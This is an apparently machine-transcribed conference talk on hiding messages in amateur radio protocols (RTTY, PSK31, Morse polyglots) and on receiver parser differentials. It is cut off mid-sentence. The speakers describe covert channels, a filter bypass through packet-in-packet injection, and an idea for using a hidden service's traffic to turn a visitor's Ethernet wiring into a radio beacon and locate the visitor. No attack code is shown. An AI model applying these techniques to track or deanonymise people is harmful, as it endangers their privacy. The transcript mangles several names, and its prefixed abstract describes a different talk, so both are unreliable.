someone was watching something on YouTube. Fascinating. Thank you so much.
|
Given the rise in popularity of cloud computing and platform-as-a-service, vulnerabilities inherent to systems which share hardware resources will become increasingly attractive targets to malicious software authors. This talk first presents a classification of the possible cloud-based side channels which use hardware virtualization. Additionally, a novel side channel exploiting out-of-order-execution in the CPU pipeline is described and implemented. Finally, this talk will show constructions of several adversarial applications and demo two. These applications are deployed across the novel side channel to prove the viability of each exploit. We then analyze successful detection and mitigation techniques of the side channel attacks.
|
10.5446/32809 (DOI)
|
Howdy, y'all. So have any of you read, and I can't see you from here. They have the light set up to help us sympathize with your hangovers, which is really polite of them for your perspective. So since I can't see you, could you please cheer if you have read the Henry Miller Jr. novel, A Canicle for Leibovitz? Hey, we got one in the back! Okay, so A Canicle for Leibovitz is about a Jewish electrical engineer who founded a Catholic monastery after an atomic war in order to protect books from the Dark Ages. And the novel takes place 500 years, 1500 years, and 2500 years after the war takes place. Leibovitz is never actually in it. And it describes this morality of smuggling books and reproducing books and sharing books as like a fundamental piece of the religious faith of the characters in the novel. So for this talk, we have radio protocols which could conceivably be used in some unlikely nuclear post-nuclear future. So there you have it, Matroshka's nesting dolls and book-legging bears, if you will. So when you say a radio, I say a parser. I'm not a hardware guy, however, my favorite pastime is seeing how parsers get broken. And radios are parsers too. A radio is this kind of a parser that starts with a physical signal and somehow gets that packet, which some people call a frame, out of it. And just as any parser, it is driven by input that we can generate. We can generate it with expensive radios and sometimes with cheap radios. And if you've been following our work on Zigbee, you should have seen that you can actually generate quite a lot with very cheap radios. And again, those are very simple machines. They don't have all that much extra space, unlike a real parser which can corrupt memory and then have a state explosion in which you can drive pretty much anything, any Turing machine. But they do have some extra state and they do have some unusual behavior. So what is that unusual behavior? Mostly it manifests itself as parser differentials. So in noiseless parsers, and this is important, we're going to see that noise makes it a lot more interesting. So in noiseless parsers, beside the normal behavior when you exploit the thing with crafted input, drive it into a corrupted state, and then you drive it all the way to root shell, to Turing complete power, maybe or maybe not. So this is the common scenario. But there is another in which you feed two parsers the same signal, the same string, and they produce two different readings of it, two different interpretations of it. Now many security schemes depend on parsers parsing the same string the same way. And this is actually a strict security requirement. So X509, for example, depends on you, the CA, signing the same common name, the same data that the client, a browser, would then see. Android master key, again, depends on you parsing this package in which your application is and checking the signature, and then when you install it, interpreting the signed part exactly the same way as the crypto signer did. Otherwise, you have the Android master key when you have two different parsers, two different unzippers, and they simply unzip differently. So in crypto, this is a known failure mode when, yes, you've checked the signature, but what is the signature of? And that makes crypto a systems problem, quoting Matt Green. Again, your parsers must agree. Now that is without noise. With noise, things become a lot more interesting. In Fi, you can have two parsers, that is to say, two radios interpreting the world completely differently. In one radio's view, I am yelling really loud with a really high signal, while the other radio hears nothing at all and registers no frames. Why? Because I'm simply using a shorter preamble, or I'm putting some garbage between the preamble and the starter frame delimiter. And one radio hears frames, the other doesn't. Then of course, the starter frame delimiter itself may be corrupted by noise, in which case you get the packet and packet, which we presented a while ago. And it gets weirder. Travis is one eighth of a nibble, which you will find in the previous edition of Poco GTFO. A few issues back. We were actually able to inject a raw layer one packet controlling only layer seven data, and none of the bytes of the layer one packet that we injected were visible in the layer seven data that we transmitted. And the way that we did it was we looked at the physical layer, and we realized that the letters were sort of the same pattern shifted off from each other. So if we transmitted one letter higher and waited for time, for the time between transmission and reception to realign everything, we could create a message that did not contain any of the blacklisted strings. And this let us bypass packet and packet defense. So you can read about this. But the take home is that noise makes things really a lot more interesting. It's a third player that really makes it fun. And so for this talk, we're going to look at something similar where we're going to manipulate a commodity transmitter to produce signals that the standard receiver would not hear or hear differently than another standard receiver. Now you might confuse it with steganography. We're not exactly pursuing steganography. Our goal is to understand how those digital receivers work, what sort of primitive machines they are, and what their differences are. So this is more about parts of differentials in digital radio protocols. But book legging is also an option. You think it's a nesting goal, but in fact there is a message inside. Maybe an exploit. Maybe one of those Wassener-controlled things. So your circuits are built to extract a particular kind of message. And it may well be, and we are going to show that, that is indeed possible, that you can construct a signal that two different standard receivers will see completely differently. If you run it through one receiver, you get the bear. If you run it through another receiver, you get the book stack. But it's one and the same signal. So how to make this? You know, how to build those matryoshkas? Well for that, we'll have to look at the basic physics of radio waves. And we are asking your forgiveness for this review. So when we talk about these at the physical layer, we do that because there are tricks that you can perform at the physical layer. And if you only play with it at the higher layers, these protocols have pretty much no higher layers. So they lack packets, they lack the modern conveniences that have come from the fiction of the OSI 7-layer model. But those also make them good protocols to study for a couple of different reasons. The first is that these transmit over incredible distances. I can transmit from my apartment in America a signal by radio antenna on the roof using a 20th of the power of a light bulb. And that signal will be audible in Argentina or in Europe. I've not made it to Asia yet, but I hope to sometime soon. Maybe a better antenna would fix that. So it will be a very short book though. These are rather small. But there are, you know, this is our world. We can play with modulation. That will work particularly well for the phi circuits because they are built to detect only one kind of modulation and decode it. And we can build polyglots this way. We can play with error correction, which is just this additional part of the weird machine that rewrites the signal helpfully for you as it did the 1-8th of Enable for Zigbee. And we can play with encoding. And it should be noticed to those HEM protocols, encodings are very loose and very forgiving because they are actually meant to be keyed in by people. So here's our world. First there is the amplitude. You have your signal and you run it, you multiply that signal by your carrier wave. Now of course the world is made of signs. It's just such a thing that if you have a contour, it's easier for you to send a sine wave than just about anything else. Here you can vary the frequency. Again your signal now is not the amplitude of your sine wave but instead it's frequency. So looking at this animation you can see the raw signal at the top. That's the one that you actually want to get to the other radio. Weird modulation is that you have a really, really fast signal and you just change its strength in time with the audio signal that you want to put on top of it. For FM you have a wave that you're increasing the frequency of it or decreasing the frequency of it in order to contain that same information. And you're doing it so fast that on the receiver's end it spreads out and these are roughly as wide. But they have drastically different behaviors. For example in FM the same amount of power is being put into the channel despite what the strength of the original signal is. So your volume is sort of encoded by how far you drift away from the center instead of by how high up the signal peaks. So it's much easier for you to correctly get the volume right on a strong signal and a weak signal in FM than it is in AM. These also take different amounts of bandwidth. So AM takes less bandwidth than FM does and we'll be dealing with a protocol called single sideband that takes even less. So these are the three things that you control. One of them is a phase. So the phase you can think of having two sources, one is say a sine and the other is a negative sine or four sources sine, cosine, negative sine, negative cosine. And then you decide by using a switch which one you feed to the antenna. So the phase transitions. Now this picture is a lie because you want to avoid those rapid transitions in phase. You want to bring your amplitude down to zero at that transition. But it's not the amplitude that matters. It's the phase. It's which one you are getting. So as a mathematician you look at this and you see this world of signs. So all you need is signs and all you have is signs. And you have the choice of what to do with that sign. You can multiply it by your signal or you can add the signal to the carrier frequency or you can add the signal to the phase which if you add too much will actually make your sign into a cosine. So these are two different modulations for small changes in phase. The result is a bunch of signs anyway and you see that in your waterfall display. So when your amplitude changes with a particular rate itself then in the Fourier transform that just gives you a wave somewhere between your carrier and your carrier plus that rate and your carrier minus that rate. So you see in your waterfall displays this kind of a population of signs that you get out of the Fourier transform. This is the band. You can think of the width of this band as twice the rate with which your signal changes be added to the amplitude, to the frequency or to the phase. Of course no one does a Fourier transform on receive. This is just a mathematician's fantasy. Instead you have circuits that actually extract the signal and reconstruct the A, the F or the alpha for you. And by the way this is an alpha because theta was not available in goddamn keynote. We'll be cursing a lot more in this lecture especially when I find myself desperate enough to open up can of Alexander Keats. If anyone has any real IPA in the audience I'd appreciate a bottle. So an amateur radio operator thinks about this differently. We use what's called upper sideband modulation which is sort of like half of AM. You take AM and you cut out all the redundancies. So the end result of upper sideband is that you're just taking something that's at a radio frequency and you're shifting it down until it's at an audio frequency. But all of the distances between things remain the same. So if let's say the radio frequency were 1 megahertz and there's a radio sine wave at 1 megahertz plus 1 kilohertz and 300 hertz above that there's another sine wave. Well when I downshift that by an upper sideband radio tuned to 1 megahertz I wind up with a 1 kilohertz tone and a 1.3 kilohertz tone. They're the same distance from each other. Oh God bless you sir. Sir Gage could you? Ask and you shall receive. Oh now we need a glass. I mean I can't drink the entire bottle in one sitting. So your radio spectrum is just downshifted to audio frequencies. There's a related style called lower sideband where you do the same thing but you flip it upside down in the end. And that's usually only used for voice and never for data. So one second. The radio operator also sees a difference between frequency shift keying and phase shift keying. But the operator sees it visually. Not conceptually so much. So frequency shift keying visually looks like two separate sine waves that are separated from each other. So you see two peaks in the waterfall diagram. Phase shift keying looks different. It looks like a single sine wave so it could be Morse code except it's just a little bit too wide. And the faster you make the symbol rate the wider it becomes. So PSK 31 is nice and narrow. PSK 63 is twice as wide as that. And the data rates in these protocols are very low because they're designed to fit within the audio channel. You have to be able to run an audio cable from your shortwave receiver to your laptop to decode it. And another cable from your laptop's microphone, sorry, speaker jack out to the radio in order to transmit it. So when I first saw the upper sideband trick I did not quite understand why and what it was. And then through some interaction between a former mathematician and an active ham, I'm yet to get my ham license. Please do not blame me. Do not try to put more pressure on me to get one. Finally, it turned out that it's a very simple thing. Basically when you do this for your transform you get for every sine wave that is your carrier plus something. You get another sine wave that's your carrier minus something, which carries exactly the same information so long as the modulation scheme is concerned. It just takes twice the bandwidth. So it's like the subway... Man spreading, they call it. Yeah, one of those things. Apparently you can get arrested for that in New York. And so what we do is we just cut the lower half. That's a very drastic way to deal with that. So you reduce the redundancy but you shorten the bandwidth by half. So you just left with one kind of sine waves which are your carrier plus something, not your carrier minus that exact same thing. And that's the upper sine band modulation. So there you go, that's as clear as it was made for me. The other thing to note is that the central spike gets cut out in upper side band modulation. The central spike in AM radio occurs at the position that would be zero hertz in audio. So it doesn't actually contain any information. Instead, it acts as a way to allow the receiver to know where the transmitter is centered. So that if the receiver and the transmitter disagree a little bit, in AM you still get a clean signal. That way my father and his 57 Studebaker can listen to a modern AM radio station and hear it correctly even though that Studebaker has no chance in hell of accurately generating reference clock. In single side band modulation, you have to generate your own reference clock and wherever it's wrong that adds to or subtracts from the frequency of the thing you're listening to. So if you're off by just a few hertz, an adult voice will turn into a child, a man will turn into a woman or vice versa. So but again, this is the wonderful world in which it's all about the receiving circuit. It's all about the parser. And so we can actually hide quite a bit of information and have quite a few polyglots using those properties. So we're going to skip the story largely, which you will find in the Poco GTFO of why you might want to do that. I hope here we need to convince no one that book legging is a good thing. And furthermore that the dystopia in which we have to do it is well kind of upon us. A show of hands. Is anyone here opposed to reading? All right, get out. But of course, now we have this fantasy situation in which the book legging is done by really large antennas. Yeah, see, you have like a little hut out in the woods somewhere. You run some gigantic wires off of it. They have to be specific lengths to match the frequency that you're transmitting. We're skipping over that here. But if any amateur radio book should explain this to you. I should stress though that the modulation tricks and the receiver tricks are the same for grown up protocols. Of course, these have much faster data rate, but they have the same modulation schemes or build on existing modulation schemes that we're going to talk about. PSK, for example, is what you would find in Zigbee. So the first protocol we're going to discuss is called RTTY. It's also called RITI. RTTY is a military protocol from the late 30s and early 40s. This was used in practice in World War II. The idea is that you have a ticker tape. The ticker tape on the right is from a military teletype writer that was brought to the most recent Dutch hacker camp. And they actually had two of them wired up so that you can send a signal between each other. And it used a Bodo tape, which is the paper tape that you see on the right. You'll notice that there are five bit positions and that there's like a center line that has smaller holes. And the center line is used for timing. In order to transmit a message with this machine, you first type it into a typewriter which punches the holes that you see here. And then you take that tape and you run it into the radio transmitter. The radio transmitter feeds it through and runs it into an FSK modulator in order to send a radio signal that the other unit could receive. The nifty thing about this is that a ton of military surplus equipment was available in the wake of the Korean War. And this wound up in amateur hands. So, and this encoding is very much like a serial port. You have five data bits, you have no parity bits, and you have two stop bits. If anyone here is old enough to remember 8E1, this is just 5N2. I'm old enough. Actually I said, well, I know, we'll just put the picture of a serial port. And Travis said, it's older than that port. This definitely predates the DB9 connector. What's that pretentious name for the DB9 connector once it finally got standardized? Anyways, this is a picture of the machine from an original catalog. I've not been able to find a vintage picture in color. In modern times, the operator will use software that's compatible with it. So the audio is run out from the sound card, sorry, out from the radio to the sound card, and back from the sound card's output to the radio's input. And you sort of go blind when you're transmitting. Because when you transmit, you're sending so much power that you're not able to receive on the same frequency at the same time. But then of course you always do. In your Wi-Fi, you have exactly the same situation. And your collision avoidance is in other MEC protocols that are developed specifically for you to dance this dance without stepping on anyone's transmissions. Because you can't, unlike Ethernet, hear that somebody intruded on your transmission. The upper left of this window shows the frequency that the radio is tuned to. You either synchronize this manually or you run a serial port from your computer to your radio. So I have some radios back in America that I can access from here through SSH. And I can have them transmit the examples that I'm showing today. And apparently this is all that these people transmit. CQ, CQ, CQ, which means howdy, as I learned. Yeah, they're not big for long conversations. I think they're constantly impressed with the functioning of their own radios. So you can see here that the radio is tuned to a little bit higher than 14 megahertz. 14 megahertz and 70 kilohertz. And then you'll notice that there's a smaller number to the right, which is 14071.085. That is the center frequency that has been selected in the graphical program. Because your upper sideband receiver has a radio frequency that it's tuned to. But your actual signal is based on a radio frequency that's a bit higher. So you need both numbers. And down at the bottom, there's a waterfall diagram that shows you what the frequencies of the sound look like. In this case, your x-axis is the frequency, your y-axis is time, and the brightness is the amount of energy on that frequency at that point in time. Here you have a 2FSK signal. So you can see that the signal itself is centered on two different frequencies, which are 45 megahertz apart. Sorry, 170 hertz apart. So the receiver sort of cuts the band in half. And all it's listening for is whether there's more energy in the higher side or the lower side at that moment in time. And that gives it the serial port signal. And it goes up and down just like you would see if you put a logic analyzer on the UART in an Arduino. So again, all you have is signs. And moreover, you need to compare those signs as you receive them. This is the shifting part. But that's as much as there is to this modulation. But you can transmit pictures like that. Yeah, and people would do clever things. They would make RTTY artwork that looks very much like ASCII artwork. This is Seattle Slew, who was an American racing D. Lee Doo winner. And there is something else to notice. Notice where this is centered now. This is the audio frequency. This is the downshifted signal. It has been shifted from the actual radio carrier to the range of frequencies that you can hear and your sound card can produce. So with 1950s technology, you would wind up with a giant spool of paper tape. And running that paper tape into your receiver would produce this text art image. In the 1970s, you would have a reel-to-reel tape recorder. And you would record the audio tones and play those back in in order to recreate the message. In 2015, you just copy and pasted. And there's a lot less sport to it. The alphabet used in this protocol is quite different from ASCII that you're used to. One thing that you'll notice is that this protocol does not have a concept of upper and lower case letters. All of the letters are uppercase. The other thing that you'll notice is that for these five bit patterns, they can be either a letter or a symbol. And the way that they implement both is that there are commands that will shift to figures or shift to letters. So if you send the command to shift to figures, then it stops interpreting the future bytes as letters. And it knows that each one of them will be a symbol, like a comma or a question mark or a number. Conversely, if you send the letters command, it jumps back to figures. Sorry, if you send the letters command, it switches back to letters from figures and begins to send the letter A, the letter B, and so on. This is what we would call a context sensitive protocol. In order to know what you're receiving, you should have heard the proper register first. So if I were terribly thirsty after drinking Alexander Keats Canadian brand India Pale Ale water, I'm serious, this stuff is guilty of everything that Bud Light is accused of, but Bud Light is at least honest in its advertising. But thanks to good neighbors. We never went for a Scotch. Yes, thank you kindly again for that whiskey. So if I were drinking Alexander Keats and I just really needed something that was not watery, and I said to Sergei Chattery-Vodko-Pijalista, then we might send this over the radio as something like this. Anyone who reads Russian will note that this is transliterated and instead of translated, and there's a reason for that. So when you send the letters command, it switches to letters mode, and if you send this sequence of bytes after it says four Vodkas, the receiver will see four Vodkas. And notice that sooner or later you need to add Cyrillic that is to say Vodka to your protocol, and for that the null character was used. So if you send the figs symbol first, then everything after it gets treated as a number or as a symbol. You RU is like a special character. They have an entire character in this language that just means who the hell are you in order for one station to synchronize with another station. There's also a bell symbol. So just like a UNIX terminal, you can make the receiver start beeping if you don't like the guy on the other side. And this one, chat applications had that. You can just hit start ringing the bell if you got mad. The null character was co-opted for Russian RTTY transceivers in order to add a Cyrillic character set. And in this case, if your receiver could not support Cyrillic, it would render the same message in Latin because it doesn't know that the null does anything else. It doesn't know that it's been overloaded. These recordings, these encodings are loose and forgiving. And again, how loose and how forgiving are they? Well, what if you are human typing those letters, is actually typing them on a keyboard rather than first punching them to a tape and then running the tape? Well, then you have the idle tone. Letters is the idle tone. You just keep repeating it until there is an actual symbol. This is called a ditty. Now what happens if you run another shift character in the same way? Well, the receiver ignores it. So it doesn't actually know whether a figure is coming or a letter is coming. You can repeat those shift characters in any combination and for any length of time before an actual character comes, and the receiver will be non-divisor. Because this is a finite state machine, only the very last one counts. So you can stuff enormous sequences of shifts in this encoding. You can stuff a bear in there. This is a wonderful picture of, this is a woodcut of bears passing through the village in Siberia. This is from Europe in the 18th century when that sort of idea still reigned. But we can do better. These bears are now carrying a useful payload. They're book-legging bears coming through the village. So in practice, you would send a message from Bob to Alice in which Bob never actually starts a conversation with Alice, at least publicly. Instead, what he does is he starts a conversation with Jim Bob. And Bob and Jim Bob, they just talk back and forth about their diabetes and diabetes testing supplies. But every time Bob is kind of slow about hitting a key, and Bob is going to pretend to be a terrible typist for this transmission, every time it's idling, it can start sending one hidden bit per symbol. Like so. Now, let's take another protocol. Yeah, so we can't do any polyglots or chimeras until we've done a second protocol. So the second one we're going to introduce you to is called PSK31. This is the 1990s replacement for RTTY. So RTTY was designed in the 30s in order to be used for military equipment. And it was used at a time in which shortwave communication was often intentionally jammed, but it was not accidentally jammed by overuse. You didn't have to worry about too many people in occupied Paris sending messages to England. You had to worry about the one guy not getting shot and found. So PSK31 is designed to be narrower than RTTY. At the same time, RTTY was at a very nice speed in that RTTY transmits characters about as fast as the average typist can keep up. So it's a very good protocol for a live conversation. I can talk to you, and I'm typing about as fast as it can get through. When I'm done, you start typing back to me, and it carries about as fast as you can type. And if you're just trying to rag chew, as it's called, this is a very good protocol for that. The symbol rate is 31 and one quarter bod, which with run length encoding and other things is about the same rate as you would type. But it also has a much narrower bandwidth than RTTY. It only takes 60 hertz, whereas RTTY is spread out by 150 hertz. So you're able to fit tons of these PSK31 conversations into a single voice channel. If you tune to 28.120 megahertz, you'll see just the waterfall fill up with these different conversations. And you can click on any of them in the receiver in order to tell what they're saying. So here is finally something that actually does do a Fourier transform in the receiver. Well, it does the Fourier transform in the receiver in order to visualize it. That's what the waterfall goes through. And that's also what takes quite a bit of the processing power of the program. If you have a terribly old computer, or if you're trying to run this on a cell phone, it's kind of common to turn off the waterfall after you've found your signal frequency in order to save power and computation. And of course, again, we want the least amount of bandwidth taken by any particular conversation because, well, a whole lot of people can hear each other. Those waves travel quite far, and you don't want to pollute the band beyond necessity. And you see all that empty black space? You can fit multiple little yellow lines in there in order to have many conversations. Again, the modulation scheme is pretty simple. This time, it's phase, not frequency, as with RTTY. Then you have a carrier, and then you have either a sine or a cosine. So this is the encoding. So PSK31 works by inverting the phase of a sine wave, which is a fancy way to say that you switch from the cosine of the absolute position to the sine of the absolute position. And you're also going to multiply this by a couple of scalars in order to stretch out the signal so that it's at the appropriate audio tone. So if you first sit down with a big cup of coffee and you try to implement this, which you can do in a weekend, you'll find that at first reading, you'll think it should look like this top signal in which the sine wave just abruptly and in the middle decides to switch upside down and start going the other way. I would play this for you, except that our friendly sound guy would yell at me, and all of you would yell at me because it sounds atrocious. And we'll get to why in a second. But notice before we go on to that, that this is a shift key encoding. Again, you change the phase to indicate a zero. You keep the phase as it was to indicate a one. Now you can't know which wave is coming for you, sine or cosine. It's just a bright line on your waterfall. You don't know its initial phase. However, you can detect when the phase changes. When the phase changes, it should not change abruptly because that would hurt your ears and that would actually do nasty things to the membrane of the speaker. So at this size, it's a bit hard to see. But the wave here is actually shrinking down to nothing and then growing back. And it's at that moment when it's nothing that we invert the phase. So visually, you don't actually see that the phase inverts. And by audio, you almost can't hear it. Instead you hear the drop in amplitude. The whole signal sort of fades out just a little bit and then comes right back. And we do this in order to reduce the artifacts. When you abruptly change the phase of a signal, it spreads out over the entire bandwidth and starts interfering with other transmitters. We're actually going to see the example of that. But now, how to decode that? So if you'll forgive me for reiterating elementary school math, you recall that a positive times a positive is a positive. And you remember that a negative times a negative is also a positive. So what we're going to do is we're going to delay the signal by just a little bit and then multiply it by itself. And the way that we're doing this is we're trying to make sure that the delayed signal, if the phase is the same, will always disagree with the sign of the modern signal. So that if it is now a positive, if the phase has not changed, the old one was a negative or vice versa. And when you do that on a sine wave, you find that you have what looks like a new sine wave. It's just all beneath the zero line. The only exception is that the phase has changed. And in this case, you're multiplying a positive by a positive or a negative by a negative and it will jump above the zero line. And so in the product of these two signals, you just look to see where the peaks are and wherever it jumps above a certain threshold, you know that that's where your signal is. And that's how the decoding circuit would actually work. It cares nothing for the amplitude. It cares not that much for the frequency so long as you don't shift the phase too much. And just like RTTY, there's a special alphabet for this. It does not use ASCII because ASCII isn't very efficient for English text. And it tries to do like Morse code does where the short letters are kept short and they added the concept of upper and lower case letters to it. So this you'll find in the recon edition of Pocke GTFO. If you zoom in on this table, you'll note that the lower case A is shorter than the upper case A, the lower case B is shorter than the upper case B. And this is because as you're typing a sentence, the first letter of each sentence is more likely to be capitalized. The majority of what's inside of the sentence is not. When you do announcements, if you're saying CQ, CQ, DE, call sign, well that's all in upper case and because of that it takes a bit longer to transmit. Notice something about the encoding scheme here. First of all, every letter begins and ends with one, right? No letter contains more than one zero. In fact, two or more zeros separate letters. That's the very code, encoding convention. So what happens if you send more than two zeros? Again, your circuit doesn't care. Your decoder latches on the double zero and it can tolerate as many of those zeros as you like. If your letter is too long, it will be ignored. So that's how you could add Russian and call for more vodkas in that scheme. This is how the original author of the PSK31 protocol is British. And at some point he tried to type the pound symbol into his terminal and it didn't work. And he realized at that point that pound was in the upper half of the ASCII table. So in order to add support for that, he just added all of the upper 128 symbols of ASCII all at once and it's your local code that matters. This of course predates Unicode. And he did this because the original code examples that he provided would ignore any symbol that was too long. It would just assume that it was a mis-transmission and it would throw it out. So by sending ones that were longer than that, he knew that they would not be interpreted as anything else. Well, we can go a bit further than that. We can have thousands of bits in a row and the common receivers don't actually look up what the letter is until they get that final zero zero. So you'd have large binaries thrown in the middle of a PSK31 transmission that at the end of the day look like a single misinterpreted letter to the receiver. So again, you can have a whole herd of bears passing through unbeknownst to the receiving circuit. But then of course, all of these are encoding tricks. Encoding tricks are boring. Let's do something more interesting, NSCI's a free nickname. Let's do five tricks. So at this point, I'm going to play for you a PSK31 sound so you can get a feel for how it comes in over the air. So imagine a setup like this. You have a machine with a sound card and you feed that through the sound card to the radio. It's this audio range that you can actually hear and the radio will then upshift it and send it up around the carrier. So as I play this now, keep in mind that someone who has a good copy of this audio recording, perhaps from the video, can decode the message that's being transmitted after the fact because it carries through just like modem noise, but it's such a lower rate that it's more error tolerant. So you can also kind of hear it waving in amplitude. That's when a zero crossing occurs and we drop the power of the signal in order to make sure that it finishes cleanly at a zero crossing without spreading out over the band. And in real world use, I would run an audio cable from my computer to my shortwave radio and tell the radio to transmit whenever it heard noise. There have been cases for Cuban number stations where they've been able to identify which version of Windows they run because they hear the Windows XP startup noise on that frequency every couple of days. This is why I highly recommend that you use a secondary sound card. So it's not all that hard to make those signals. Here is a bit of a Python-y math that does that. So the first thing that you need is your audio sample rate. Most of you who do audio work stick to 44.1 kilohertz as a sample rate because that's what's used by an audio CD. Unfortunately, when this protocol was designed in the 90s, audio CDs were still rather rare and the standard thing to work for was an audio DSP. And audio DSPs worked on samples that were multiples of 8 kilohertz. So in this case, we use 48 kilohertz in order to make everything evenly divide. You also need to choose a volume. In my case, I wanted my signal to be rather weak because I have a friend down the street who also plays with amateur radio in these frequencies and I didn't want to jam his entire view of the world by transmitting too loudly for him to hear over it. You also need to choose a divisor. In this case, we're taking the audio rate, which is 48,000, and we're dividing that by 1,000 in order to get 48. You also need a length, which is the integer number of samples per symbol. In this case, audio rate divided by 31.25, which happens to be an even integer number of samples for 48 kilohertz audio rates, but not for 44.1. There are also some variables within your PSK31 generator. In this case, I is going to be our sample index, and that's the index within the sample. So it's like from zero to length. And at the next symbol, it starts over again at zero. We do this so that the symbols can be loaded into a buffer and then copied and pasted elsewhere in the audio file without having to recompute them. Also you'll find that in Python, if you keep adding one symbol to a buffer, things take forever. And then the phase is just a zero or a one. A zero is for the initial phase. A one is for the opposite of that. So we can call those sine and cosine or cosine and sine. From the receiver's position, because it doesn't know where zero is, these might as well be the same thing. And you will have these scripts to play with. So the naive way to generate this is that the sample to give an index is the sine of pi times the phase, that's to give us our phase inversion, plus two pi times the index over the divisor, which is like the fraction through the sample that we are. And then we multiply the whole thing by the volume. This sounds terrible for reasons that we'll get back to in a second, but it produces that nice clean inversion of phase because we're inverting the phase on one exact sample. We get the little McDonald's arches there in the middle. The right way to do this is to filter it. And the way that we filter it is that we add an attenuation variable in which the 10 of i equals the sine of the index times pi divided by the length. And what this does is it causes the signal strength of the entire symbol to begin at zero, work its way up to full volume, and then drop back down to zero for the next symbol. This version is slightly simplified in that I'm assuming that we are transitioning on both this symbol and the next symbol. If you wanted to keep everything at full power when you could, you would instead make this only rise or drop on one side. The screenshot that you see at the bottom is that style in which whenever the phase is not changing, the amplitude does not drop. These are the audio spectrums of wave files that were generated by each method. You'll note that the one on the left is a nice clean, thin green line with a few harmonics where it's unavoidable. And the harmonics are very thin and they're very weak. You'll also note that the second one is a bright green mess. And wherever you see a horizontal green line, those are your speakers making a really loud and annoying click. And they make one of those clicks every couple of tens of milliseconds. So as you're listening to it, the original signal is there. You can still parse the message out of it. But it's spewing out all over the spectrum. And in radio, it spews out into adjacent audio channels. So you're not only ticking off the people who are sharing the PSK31 audio segment with you, but also all of the channels above and beneath you. So there is a reason for that. If you think about how this rapid transition at high amplitude breaks down under the Fourier transform, to represent this gap, this non-continuous shape, you need all kinds of sine waves. You need sine waves with much higher frequency than your band. And of course, when you do your actual Fourier transform or your fast Fourier transform, you get those boundary artifacts at all kinds of those higher and lower frequencies. And of course, the Fourier transform tries to represent the shape of your strange, non-sine piece of the wave as carefully as it can. The same happens on the circuits if you're not using a filter. And that's why you're getting that spillover all over the place. So the amplitude trick is actually essential. It's a lie to show the PSK without it. So neighbor by the name of Craig Hefner is here. And as I was describing this to him in Boston, he starts laughing. And he tells me that when he built a PSK 31 decoder, he never paid attention to the phase. He just looked for that drop in amplitude. And so he taught me a trick. And I love when you drink with people who, like you describe a paper to them, and they like immediately think of how you did what you're talking about, but by a completely different method that happens to also work. So his idea, which also works, is that you can drop the amplitude anyways, even though it's not required during a one. And so the two wave forms here are as we did in Audacity. You'll note that the power envelopes are drastically different. So the above one I can visually read is PSK 31 is like a bunch of zeros and then a one and then a zero and then a bunch of ones and then a zero at the end. The bottom one you cannot read visually. His interpreter will fail to see this because it sees everything as being a zero. But the traditional commercial receivers will interpret the lower message fine. And this trick works beautifully. So here is another polyglot, quite unintended, due to Craig. And we're going to mark those tricks with cats, if you will. So here's another. So the next one we're going to do is a PSK 31 Morse code polyglot. If you listen carefully, it's dot it ah, dot it ah, did it, did it, did it ah, did it it ah. This is my call sign in Morse code, but if you look deeper into it, you'll see that the, this is a spectrogram on the left. The top one, the first da of dot it ah, dot it ah is the letter K in Morse code and the upper da actually contains the letter K as PSK 31. So by encoding it this way, you can have a message that is valid as both PSK 31 and is Morse code in the same duration that the Morse code message would take. The only expense here is that instead of doing like a simple carrier wave, I'm spreading it out a little bit and keeping it as PSK 31 for clock recovery. And to do a real world implementation of this, you have to drop the PSK 31 amplitude to be very low, but not actually to zero because if you drop it to zero, then the receiver loses track and starts spewing noise under the screen. So consider, this is a signal that is valid for two receiving circuits at once and it's different things to those different circuits. The PSK receiver doesn't actually care about the amplitude unless it's Craig's receiver in which case it does. Whereas a Morse code receiver, the on off key receiver does not care about phase. Yeah, it only cares about amplitude. You can do a similar thing to create a PSK 31 and RTTY polyglot just by having two PSK 31 transmissions and rapidly changing which one of them is the stronger of the two because the RTTY receiver is trying to receive its bits with noise in the background. So it's perfectly okay with a little bit of energy being on each channel. All it cares about is which one is the more powerful one. And the PSK 31 receiver only caring about phase allows for rapid changes in amplitude with at most one bit error. So that's one sneaky cat. And the single bit one in a string of zeros happens to be a space. So if you make sure that the error occurs on that bit, it looks like a space to the receiver which is easy to read around. You can also do work with error correcting codes on these. So PSK 31 does not have error correcting codes, but QPSK 31 does. At DEF CON this past summer, Drapo and Dukes presented a version of JT65 in which they were second graphically encoding data within the error correcting bits. So you can do the same thing in QPSK 31 or in many of these other protocols. There are some open questions in this though. If I send a very strong signal in which the bits are very clear and I'm intentionally flipping them, then your receiver should be able to tell that I'm doing that because you'll visually see that it's a very good signal and you'll also see that the bit error rate is garbage. But to the best of my knowledge, no one's written a tool at least for the amateur radio protocols, maybe not for the higher protocols either, that actually looks to see whether the error correcting bit was intentionally mis-transmitted. And such a tool would not be terribly hard to make. So this is a very important question. Whenever you have a protocol, whenever you have a modulation scheme, the first question should be what does your noise sound like? What does your normal noise sound like? What does this sound like your normal noise? Because you sort of have this idea that your noise is uniform and random, but it's not. The fact that makes a packet in packet possible is that for example in Zigbee or 82.11, your noise comes in short bursts and it kills a symbol or two, not the entire frame somehow. I mean of course if you turn on the microwave then it's a different story, but your naturally occurring noise comes in short bursts. Whenever you have a circuit, then it's built to a practical noise, that's how it probably evolved. But what if you start playing with that noise? What then? What can you hide there? So we're running low on time, but there's one thing that's just so cool we had to include it. So you've all seen this like crazy clip art with the Ethernet cable and the bits are just flying out of it and there are ones and zeros everywhere. Turns out that actually works. So we all know that data runs over Ethernet and we also know that you quite often control a piece of that data, but you don't usually control it very well when you're the attacker. For example, I might control a Tor hidden service that's running HTTP and I control a server side script on that service and the server side script, whatever data it puts out goes down to your machine through the Tor network. And I don't know where your machine is. I don't know exactly how to get there and I don't even really control the latency very good, but I do have pretty good options as to how fast I supply data to the proxy server. So what I can do is I can send you like a burst of data and then I can sort of back off for a bit and send nothing and then I can send some more and then I can come back. So sometimes you want to expel trade data from that. For example, if I suspect that someone in a particular area is accessing my hidden service, I might want to identify that person. So it would be really handy if I could turn his home network into a radio transmitter and then drive around with a receiver until I found it. So also like we've all done Ethernet wiring and we've all been a little bit cheap about it. And one of the cheap things that you can do is you can buy a bargain basement brand Ethernet switch. And the other thing that you can do is you can have, when you untwist the pairs to crimp them, you can untwist them a little bit early and it makes it so much easier to crimp them. So I made the mistake of doing this in my apartment. Yeah, if you think this is theoretical, it's not. Yeah. So I made the mistake of doing this in my apartment. Don't switch the slide until I'm ready. I made the mistake of doing this in my apartment and I'm connected into this apartment remotely by SSH and I'm looking at the waterfall. And I see a giant chunk of noise right on a 